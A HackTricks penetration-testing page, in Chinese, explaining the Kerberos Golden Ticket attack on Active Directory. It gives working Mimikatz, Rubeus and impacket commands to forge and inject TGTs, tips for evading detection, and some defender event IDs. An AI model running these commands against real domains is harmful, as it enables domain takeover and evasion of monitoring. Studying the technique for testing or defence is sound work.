hacktricks/windows-hardening/active-directory-methodology/golden-ticket.md

金票

从零开始学习AWS黑客技术，成为英雄 htARTE (HackTricks AWS红队专家)！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
• 获取官方PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在Twitter上关注我 🐦 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

金票

可以使用krbtgt AD账户的NTLM哈希创建任何用户的有效TGT。伪造TGT而不是TGS的优势在于能够访问域中的任何服务（或机器）和被冒充的用户。
此外，krbtgt的凭据从不会自动更改。

可以从域中任何DC的lsass进程或NTDS.dit文件中获取 krbtgt账户的NTLM哈希。也可以通过DCsync攻击来获取NTLM，可以使用Mimikatz的lsadump::dcsync模块或impacket示例secretsdump.py来执行。通常，无论使用哪种技术，都需要域管理员权限或类似权限。

还必须考虑到使用AES Kerberos密钥（AES128和AES256）伪造票据是可能的，也是更可取的（操作安全性）。

{% code title="来自Linux" %}

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

{% endcode %}

{% code title="来自Windows" %}

#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

{% endcode %}

一旦你注入了金票，你就可以访问共享文件**(C$)，并执行服务和WMI，因此你可以使用psexec或wmiexec**来获取一个shell（看起来你无法通过winrm获取shell）。

绕过常见检测

检测金票最常见的方法是检查网络上的Kerberos流量。默认情况下，Mimikatz 将TGT签名10年，这在随后使用它发出的TGS请求中会显得异常。

有效期：2021年3月11日 下午12:39:57；2031年3月9日 下午12:39:57；2031年3月9日 下午12:39:57

使用/startoffset、/endin和/renewmax参数来控制开始偏移、持续时间和最大续订次数（所有时间单位都是分钟）。

Get-DomainPolicy | select -expand KerberosPolicy

不幸的是，TGT的生命周期不会在4769事件中记录，因此你不会在Windows事件日志中找到这些信息。然而，你可以关联的是看到4769事件_没有_之前的4768事件**。不可能在没有TGT的情况下请求TGS，如果没有记录发出TGT，我们可以推断它是离线伪造的。

为了绕过这种检测，检查钻石票据：

{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}

缓解措施

• 4624：账户登录
• 4672：管理员登录
• Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property

防御者可以采取的其他小技巧是对敏感用户的4769事件发出警报，例如默认的域管理员账户。

关于Golden Ticket的更多信息在ired.team.

从零开始学习AWS黑客攻击直到成为专家，通过 htARTE (HackTricks AWS红队专家)！

支持HackTricks的其他方式：

• 如果你想在HackTricks中看到你的公司广告或下载HackTricks的PDF，请查看订阅计划！
• 获取官方的PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。